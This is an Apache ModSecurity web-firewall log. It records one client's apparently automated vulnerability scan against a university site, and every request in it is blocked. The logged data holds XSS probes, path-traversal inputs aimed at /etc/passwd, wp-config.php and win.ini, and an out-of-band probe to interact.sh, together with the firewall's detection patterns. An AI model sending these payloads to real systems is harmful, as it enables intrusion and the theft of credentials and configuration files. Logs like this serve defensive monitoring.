[Tue Aug 29 11:54:21.064958 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-cCo-f0AAApa-D0AAAAg"]
[Tue Aug 29 11:54:21.552405 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAApXgccAAAAU"]
[Tue Aug 29 11:54:22.885599 2023] [:error] [pid 2676] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAAp0OEMAAAAI"]
[Tue Aug 29 11:54:23.580852 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApZHVAAAAAf"]
[Tue Aug 29 11:54:24.925338 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AMCo-f0AAApbUTsAAAAh"]
[Tue Aug 29 11:54:27.027267 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAApl9-oAAAAo"]
[Tue Aug 29 11:54:27.055509 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAqTvjAAAAAa"]
[Tue Aug 29 11:54:27.571550 2023] [:error] [pid 2709] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAqVbzgAAAAi"]
[Tue Aug 29 11:54:29.826145 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAor7wgAAAAk"]
[Tue Aug 29 11:54:30.603913 2023] [:error] [pid 2676] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16BsCo-f0AAAp0OFkAAAAI"]
[Tue Aug 29 11:54:31.667355 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqdblkAAAAw"]
[Tue Aug 29 11:54:32.878201 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqY55IAAAAr"]
[Tue Aug 29 11:54:33.552884 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqY55MAAAAr"]
[Tue Aug 29 11:54:34.602928 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqUB2kAAAAb"]
[Tue Aug 29 11:54:34.604590 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAAqb-qUAAAAu"]
[Tue Aug 29 11:54:35.702125 2023] [:error] [pid 2716] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqci64AAAAv"]
[Tue Aug 29 11:54:35.712048 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqdbmQAAAAw"]
[Tue Aug 29 11:54:38.037247 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAApZHW4AAAAf"]
[Tue Aug 29 11:54:38.669119 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAo2nCQAAAAA"]
[Tue Aug 29 11:54:39.883253 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_fa47b8be7f27fccc6a265843bd9d9137d244819e"): Internal error [hostname "digilibfh.unla.ac.id"] [uri "/config.inc.php-sample.php"] [unique_id "ZO16D8Co-f0AAAqY56EAAAAr"]
[Tue Aug 29 11:54:40.536579 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqUB3MAAAAb"]
[Tue Aug 29 11:54:41.607200 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAApk-XQAAAAn"]
[Tue Aug 29 11:54:41.635305 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAqUB3cAAAAb"]
[Tue Aug 29 11:54:44.622697 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqSwkkAAAAN"]
[Tue Aug 29 11:54:46.651699 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqZubIAAAAs"]
[Tue Aug 29 11:54:47.594350 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAn41BIAAAAW"]
[Tue Aug 29 11:54:50.577686 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqXyR4AAAAq"]
[Tue Aug 29 11:54:50.586623 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqRzEoAAAAM"]
[Tue Aug 29 11:54:50.699492 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAApbUXwAAAAh"]
[Tue Aug 29 11:54:51.564111 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16G8Co-f0AAAqSwlYAAAAN"]
